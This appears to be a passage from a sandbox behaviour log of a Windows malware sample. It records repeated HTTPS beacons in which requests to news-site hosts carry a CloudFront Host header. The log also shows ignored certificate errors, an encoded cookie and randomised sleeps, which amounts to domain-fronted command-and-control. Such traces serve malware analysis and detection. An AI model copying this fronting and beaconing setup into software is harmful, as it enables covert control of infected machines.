Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:22 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:22 (Local Time) True 1
Fn
System Sleep duration = 12928 milliseconds (12.928 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:33 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:33 (Local Time) True 1
Fn
System Sleep duration = 14496 milliseconds (14.496 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:43 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:43 (Local Time) True 1
Fn
System Sleep duration = 12395 milliseconds (12.395 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:54 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:54 (Local Time) True 1
Fn
System Sleep duration = 13399 milliseconds (13.399 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:05 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:05 (Local Time) True 1
Fn
System Sleep duration = 13594 milliseconds (13.594 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:15 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:15 (Local Time) True 1
Fn
System Sleep duration = 14922 milliseconds (14.922 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:26 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:26 (Local Time) True 1
Fn
System Sleep duration = 12890 milliseconds (12.890 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:37 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:37 (Local Time) True 1
Fn
System Sleep duration = 13768 milliseconds (13.768 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:48 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:48 (Local Time) True 1
Fn
System Sleep duration = 12597 milliseconds (12.597 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:58 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:58 (Local Time) True 1
Fn
System Sleep duration = 14512 milliseconds (14.512 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:09 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:09 (Local Time) True 1
Fn
System Sleep duration = 12289 milliseconds (12.289 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:20 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:20 (Local Time) True 1
Fn
System Sleep duration = 12913 milliseconds (12.913 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:30 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:30 (Local Time) True 1
Fn
System Sleep duration = 14074 milliseconds (14.074 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:41 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:41 (Local Time) True 1
Fn
System Sleep duration = 13702 milliseconds (13.702 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:52 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:52 (Local Time) True 1
Fn
System Sleep duration = 14513 milliseconds (14.513 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
